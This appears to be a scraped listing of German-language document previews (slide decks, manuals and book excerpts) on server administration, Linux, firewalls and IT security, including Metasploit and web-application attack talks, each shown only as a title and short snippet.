Mehr

Session Storage im Zend Server Cluster Manager

Session Storage im Zend Server Cluster Manager Session Storage im Zend Server Cluster Manager Jan Burkl System Engineer, Zend Technologies Agenda Einführung in Zend Server und ZSCM Überblick über PHP Sessions Zend Session Clustering Session Hochverfügbarkeit

Mehr

Verteilte Administration mit STAF (Software Testing Automation Framework)

Verteilte Administration mit STAF (Software Testing Automation Framework) UnFUG (Unix Friends and User Group der FH Furtwangen) Verteilte Administration mit STAF (Software Testing Automation Framework) Tobias Walter (tobias@unwichtig.org) http://www.unwichtig.org 13. Januar

Mehr

Literatur. Einführung in Unix. Login. Passwort. Mag. Thomas Griesmayer. Benutzererkennung und Passwort Case-Sensitiv Prompt

Literatur. Einführung in Unix. Login. Passwort. Mag. Thomas Griesmayer. Benutzererkennung und Passwort Case-Sensitiv Prompt Literatur Einführung in Unix Introduction to Unix Martin Weissenböck: Linux, 2000, 2. Auflage, Adim Bodo Bauer: SuSE Linux 6.2, Installation, Konfiguration und erste Schritte, 1999, 15. Auflage, SuSE Verlag.

Mehr

KASPERSKY SECURITY FOR VIRTUALIZATION 2015

KASPERSKY SECURITY FOR VIRTUALIZATION 2015 KASPERSKY SECURITY FOR VIRTUALIZATION 2015 Leistung, Kosten, Sicherheit: Bessere Performance und mehr Effizienz beim Schutz von virtualisierten Umgebungen AGENDA - Virtualisierung im Rechenzentrum - Marktübersicht

Mehr

Isabel Arnold CICS Technical Sales Germany Isabel.arnold@de.ibm.com. z/os Explorer. 2014 IBM Corporation

Isabel Arnold CICS Technical Sales Germany Isabel.arnold@de.ibm.com. z/os Explorer. 2014 IBM Corporation Isabel Arnold CICS Technical Sales Germany Isabel.arnold@de.ibm.com z/os Explorer Agenda Introduction and Background Why do you want z/os Explorer? What does z/os Explorer do? z/os Resource Management

Mehr

Remote Administration von Windows Servern mit Microsoft Terminal Services und OpenSSH

Remote Administration von Windows Servern mit Microsoft Terminal Services und OpenSSH Remote Administration von Windows Servern mit Microsoft Terminal Services und OpenSSH von Dominick Baier (dbaier@ernw.de) und Jens Franke (jfranke@ernw.de) 1 Einleitung Dieses Dokument behandelt die flexible

Mehr

2. Automotive SupplierS Day. Security

2. Automotive SupplierS Day. Security 2. Automotive SupplierS Day Security Cyber security: Demo Cyberangriffe Steigen rasant An BEDROHUNGEN VERÄNDERN SICH: Heutige Angriffe durchdacht und erfolgreich Damage of Attacks DISRUPTION Worms Viruses

Mehr

Technische Voraussetzungen für f r CRM Hosting

Technische Voraussetzungen für f r CRM Hosting Technische Voraussetzungen für f r CRM Hosting Holger Rackow Technologieberater - Microsoft Dynamics CRM Microsoft Dynamics CRM 3.0 Wo stehen wir heute? Microsoft CRM weltweites Kundenwachstum 53 Länder,

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Dr. Marc Rennhard Institut für angewandte Informationstechnologie Zürcher Hochschule Winterthur marc.rennhard@zhwin.ch Angriffspunkt

Mehr

5 Meterpreter-Kung-Fu Die Post-Exploitation-Phase

5 Meterpreter-Kung-Fu Die Post-Exploitation-Phase 212 5 Meterpreter-Kung-Fu Die Post-Exploitation-Phase Abb. 5 5 Erstellter Benutzer mit Domain-Admin-Berechtigungen 5.8 Pivoting Konnte im Rahmen eines Penetrationstests ein System mit mehreren Netzwerkkarten

Mehr

3 Analyse der Informationen und Auswertung von Schwachstellen

3 Analyse der Informationen und Auswertung von Schwachstellen 3 Analyse der Informationen und Auswertung von Schwachstellen Webquellen: http://www.packetstormsecurity.org http://www.2600.com http://www.theregister.co.uk/content/55/16725.html Nessus, ISS Scanner Empfehlenswerte

Mehr

Readme-USB DIGSI V 4.82

Readme-USB DIGSI V 4.82 DIGSI V 4.82 Sehr geehrter Kunde, der USB-Treiber für SIPROTEC-Geräte erlaubt Ihnen, mit den SIPROTEC Geräten 7SJ80/7SK80 über USB zu kommunizieren. Zur Installation oder Aktualisierung des USB-Treibers

Mehr

Secure Linux Praxis. ein How-To Vortrag am 11.05.2006. Christoph Weinandt Systemadministrator / Security Officer ComBOTS AG, Karlsruhe

Secure Linux Praxis. ein How-To Vortrag am 11.05.2006. Christoph Weinandt Systemadministrator / Security Officer ComBOTS AG, Karlsruhe Secure Linux Praxis ein How-To Vortrag am 11.05.2006 Christoph Weinandt Systemadministrator / Security Officer ComBOTS AG, Karlsruhe Workshop Agenda "IT-Sicherheit" - Grundlagen - Gefährdungen Linux Absicherung

Mehr

Compliance mit dem IEM Endpoint Manager durchsetzen

Compliance mit dem IEM Endpoint Manager durchsetzen Compliance mit dem IEM Endpoint Manager durchsetzen PPPvorlage_sxUKMvo-05.00.potx santix AG Mies-van-der-Rohe-Straße 4 80807 München www.santix.de santix AG 2 Sicherheit in der IT Was bedeutet Sicherheit

Mehr

Scanner, Sniffer und Scanlogger

Scanner, Sniffer und Scanlogger Scanner, Sniffer und Scanlogger Sniffer Sniffer Grundlagen Promiscuous Mode Ethernet Gefahren und Nutzen von Sniffer Praxis mit Buttsniff und Sniffit Sniffer Grundlagen Ein Sniffer ist ein Device, ob Software

Mehr

1.1 Was ist das Metasploit-Framework?

1.1 Was ist das Metasploit-Framework? 1 Nach nur einem Tag war es den Angreifern gelungen, aktuelle personenbezogene Daten einzusehen, nach zwei Tagen hatten sie Zugriff auf die aktuellen und noch unveröffentlichten Ergebnisse der Entwicklungsabteilung,

Mehr

Next Generation Firewalls. Markus Kohlmeier DTS Systeme GmbH

Next Generation Firewalls. Markus Kohlmeier DTS Systeme GmbH Next Generation Firewalls Markus Kohlmeier DTS Systeme GmbH Geschichte der Firewalltechnologie 1985 erste Router mit Filterregeln 1988 erfolgte der erste bekannte Angriff gegen die NASA, der sogenannte

Mehr

1 Linux-Befehlsübersicht

1 Linux-Befehlsübersicht 1 Linux-Befehlsübersicht 1.1 Dateiverwaltung ls Verzeichnisinhalt anzeigen (list) ls -l ausführliche Darstellung ls -a auch versteckte Dateien auisten ls -h verwende besser lesbare Einheiten (humanreadable,

Mehr

Archive / Backup System für OpenVMS

Archive / Backup System für OpenVMS Archive / Backup System für OpenVMS DECUS Symposium 2002 Bonn Vortrag-Nr. 3C04 Günther Fröhlin Compaq Computer Corporation Colorado Springs, USA 1 Highlights V4.0 Auslieferung Januar 2002 Hauptversion

Mehr

IT-Security durch das passende OS. Oracle Solaris 11.2.

IT-Security durch das passende OS. Oracle Solaris 11.2. IT-Security durch das passende OS. Oracle Solaris 11.2. Heiko Stein Senior IT-Architekt etomer GmbH Agenda. Motivation (?) Compliance und Security in Solaris 11.2 Besondere Funktionen und deren Nutzung

Mehr

5.15 In lokale Netzwerke über das Internet eindringen

5.15 In lokale Netzwerke über das Internet eindringen 222 5 Anwendungsszenarien Abschnitten deutlich gemacht. In unserem Beispiel war die Windows-Firewall ständig eingeschaltet. Die Datei Backdoor.exe wurde mit dem Online-Virenscanner von Trend Micro geprüft,

Mehr

Mobility mit IBM Traveler The Way it goes. Dötsch, Stefan. Consultant Collaboration Management

Mobility mit IBM Traveler The Way it goes. Dötsch, Stefan. Consultant Collaboration Management Mobility mit IBM Traveler The Way it goes. Dötsch, Stefan. Consultant Collaboration Management Agenda 1. Rückblick Was hat sich getan..? 2. Neuerungen Angekündigte Features und Roadmap 3. Troubleshooting

Mehr

Der Befreiungsschlag für Ihr Office 1/22

Der Befreiungsschlag für Ihr Office 1/22 OpenOffice.org Der Befreiungsschlag für Ihr Office OpenOffice.org 1/22 Inhalt Über OpenOffice.org Die Anwendungen Screenshots Die Suite Highlights Die Historie Neue Meilensteine Projekte Links Zahlen Was

Mehr

PCI Security Scan. Beweisen Sie Ihre Sicherheit! Ihre Vorteile auf einen Blick:

PCI Security Scan. Beweisen Sie Ihre Sicherheit! Ihre Vorteile auf einen Blick: Beweisen Sie Ihre Sicherheit! Unser Security Scan ist eine Sicherheitsmaßnahme, die sich auszahlt. Systeme ändern sich ständig. Selbst Spezialisten kennen nicht alle Schwachstellen im Detail. Der PCI Scan

Mehr

Phion Netfence Firewall Mag. Dr. Klaus Coufal

Phion Netfence Firewall Mag. Dr. Klaus Coufal Phion Netfence Firewall Mag. Dr. Klaus Coufal Übersicht I. Konzepte II. Installation und Konfiguration III. High Availability IV. Firewall V. VPN Server VI. Management Center VII. Addons Mag. Dr. Klaus

Mehr

Empfehlungen zu einem. Internetgefahren. Bodo Erbach, Bereichsleiter MV

Empfehlungen zu einem. Internetgefahren. Bodo Erbach, Bereichsleiter MV Empfehlungen zu einem wirksamen Schutz vor Internetgefahren Bodo Erbach, Bereichsleiter MV Internetsicherheit ets e e t heute wachsende Bedarfe unsere Empfehlungen messerknecht und Astaro Astaro Overview

Mehr

Das Metasploit Framework

Das Metasploit Framework Das Metasploit Framework Eine Einführung in das Penetration Testing Framework Maximilian Blenk Martin Hartmann Sommersemester 15 Betreuender Professor: Prof. Dr. Christoph Karg Inhaltsverzeichnis Listings........................................

Mehr

Microsoft Windows SharePoint Services. Tom Wendel Microsoft Developer Evangelist

Microsoft Windows SharePoint Services. Tom Wendel Microsoft Developer Evangelist Microsoft Windows SharePoint Services Tom Wendel Microsoft Developer Evangelist Microsoft SharePoint Foundation 2010 Tom Wendel Microsoft Developer Evangelist Agenda Was ist dieses SharePoint Foundation

Mehr

Sysadmin Day 2010. Windows & Linux. Ralf Wigand. MVP Directory Services KIT (Universität Karlsruhe)

Sysadmin Day 2010. Windows & Linux. Ralf Wigand. MVP Directory Services KIT (Universität Karlsruhe) Sysadmin Day 2010 Windows & Linux just good friends? friends!!! Ralf Wigand MVP Directory Services KIT (Universität Karlsruhe) Voraussetzungen Sie haben ein Active Directory Sie haben einen Linux Client

Mehr

Künstliche Intelligenz

Künstliche Intelligenz Künstliche Intelligenz Data Mining Approaches for Instrusion Detection Espen Jervidalo WS05/06 KI - WS05/06 - Espen Jervidalo 1 Overview Motivation Ziel IDS (Intrusion Detection System) HIDS NIDS Data

Mehr

Neuigkeiten in Microsoft Windows Codename Longhorn. 2006 Egon Pramstrahler - egon@pramstrahler.it

Neuigkeiten in Microsoft Windows Codename Longhorn. 2006 Egon Pramstrahler - egon@pramstrahler.it Neuigkeiten in Microsoft Windows Codename Longhorn Windows Server - Next Generation Derzeit noch Beta Version (aktuelles Build 5308) Weder definitiver Name und Erscheinungstermin sind festgelegt Direkter

Mehr

Foreign Data Wrappers

Foreign Data Wrappers -Angebot Foreign Data Wrappers Postgres ITos GmbH, CH-9642 Ebnat-Kappel Swiss Postgres Conference 26. Juni 2014 Foreign Data Wrapper Postgres -Angebot Foreign Data Wrapper? Transparente Einbindung (art-)fremder

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen FAEL-Seminar Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte

Mehr

EEX Kundeninformation 2002-08-30

EEX Kundeninformation 2002-08-30 EEX Kundeninformation 2002-08-30 Terminmarkt - Eurex Release 6.0; Versand der Simulations-Kits Kit-Versand: Am Freitag, 30. August 2002, versendet Eurex nach Handelsschluss die Simulations -Kits für Eurex

Mehr

Herzlich Willkommen. Christian Rudolph IT-Consultant VMware Certified Professional

Herzlich Willkommen. Christian Rudolph IT-Consultant VMware Certified Professional Herzlich Willkommen Christian Rudolph IT-Consultant VMware Certified Professional Agenda VMware Firmenüberblick VMware Produktüberblick VMware Virtualisierungstechnologie VMware Server im Detail VMware

Mehr

IT-Symposium 2008 04.06.2008. HOB Remote Desktop VPN Your Desktop-Anywhere-Anytime 6/9/2008 1

IT-Symposium 2008 04.06.2008. HOB Remote Desktop VPN Your Desktop-Anywhere-Anytime 6/9/2008 1 HOB RD VPN HOB Remote Desktop VPN Your Desktop-Anywhere-Anytime Joachim Gietl Vertriebsleiter Central Europe 6/9/2008 1 HOB RD VPN Eine branchenunabhängige Lösung für alle Unternehmen die Ihren Außendienst

Mehr

IT Engineering Continuous Delivery. Development Tool Chain Virtualisierung, Packer, Vagrant und Puppet. Alexander Pacnik Karlsruhe, 20.05.

IT Engineering Continuous Delivery. Development Tool Chain Virtualisierung, Packer, Vagrant und Puppet. Alexander Pacnik Karlsruhe, 20.05. IT Engineering Continuous Delivery Development Tool Chain Virtualisierung, Packer, Vagrant und Puppet Alexander Pacnik Karlsruhe, 20.05.2014 Einleitung... worum es in diesem Vortrag geht Ziele Continuous

Mehr

IHK: Web-Hacking-Demo

IHK: Web-Hacking-Demo sic[!]sec, Achim Hoffmann IHK: Web-Hacking-Demo, Bayreuth 1. April 2014 1 von 34 IHK: Web-Hacking-Demo Achim Hoffmann Achim.Hoffmann@sicsec.de Bayreuth 1. April 2014 sic[!]sec GmbH spezialisiert auf Web

Mehr

ORA-600 und ORA-7445 in der Oracle- Datenbank. Referent: Volker Mach, Systemadministrator MT AG

ORA-600 und ORA-7445 in der Oracle- Datenbank. Referent: Volker Mach, Systemadministrator MT AG ORA-600 und ORA-7445 in der Oracle- Referent: Volker Mach, Systemadministrator MT AG Übersicht Motivation Definition ORA-600 Definition ORA-7445 Lösungsfindung Lookup-Tool unter Metalink Live-Demo Fazit

Mehr

Portable Software-Installation mit pkgsrc

Portable Software-Installation mit pkgsrc Portable Software-Installation mit pkgsrc Dipl.-Chem. Technische Fakultät Universität Bielefeld ro@techfak.uni-bielefeld.de AG Rechnerbetrieb SS 2006 pkgsrc 1 von 12 Übersicht Problemstellung Benutzersicht

Mehr

SAP Systeme absichern: Gut gemeint ist nicht gut gemacht! Erfahrungen aus SAP Security Audits und Tipps zur Härtung Ihrer Systeme

SAP Systeme absichern: Gut gemeint ist nicht gut gemacht! Erfahrungen aus SAP Security Audits und Tipps zur Härtung Ihrer Systeme SAP Systeme absichern: Gut gemeint ist nicht gut gemacht! Erfahrungen aus SAP Security Audits und Tipps zur Härtung Ihrer Systeme Ralf Kempf akquinet AG www.dsag.de/go/jahreskongress AGENDA 1. Erfahrungen

Mehr

webpdf für VMware SoftVision Development GmbH Kurfürstenstraße 15 36037 Fulda, Deutschland Tel.: +49 (0)661 25100-0 Fax: +49 (0)661 25100-25

webpdf für VMware SoftVision Development GmbH Kurfürstenstraße 15 36037 Fulda, Deutschland Tel.: +49 (0)661 25100-0 Fax: +49 (0)661 25100-25 webpdf für VMware SoftVision Development GmbH Kurfürstenstraße 15 36037 Fulda, Deutschland Tel.: +49 (0)661 25100-0 Fax: +49 (0)661 25100-25 E-Mail: sales@softvision.de Web: www.softvision.de Inhaltsverzeichnis

Mehr

am Beispiel - SQL Injection

am Beispiel - SQL Injection am Beispiel - SQL Injection Einführung Warum ist Sicherheit ein Software Thema? Sicherheit in heutigen Softwareprodukten & Trends OWASP Top 10 Kategorien Hacking Demo SQL Injection: der Weg zu den Daten

Mehr

BEDIFFERENT ACE G E R M A N Y. aras.com. Copyright 2012 Aras. All Rights Reserved.

BEDIFFERENT ACE G E R M A N Y. aras.com. Copyright 2012 Aras. All Rights Reserved. BEDIFFERENT ACE G E R M A N Y Tech Day: ACE Germany Installation eines Aras- Systems mit Demo-Datenbank Rolf Laudenbach Director Aras Community Aras (Europe) Installations-Video auf YouTube Copyright 2012

Mehr

WSUS 3.0 - Was ist neu in der nächsten WSUS-Generation?

WSUS 3.0 - Was ist neu in der nächsten WSUS-Generation? WSUS 3.0 - Was ist neu in der nächsten WSUS-Generation? Michael Kalbe Infrastructure Architect Microsoft Deutschland GmbH Agenda Rückblick auf WSUS 2.0 WSUS 3.0 Ziele Funktionen Demo Erweiterungen Weitere

Mehr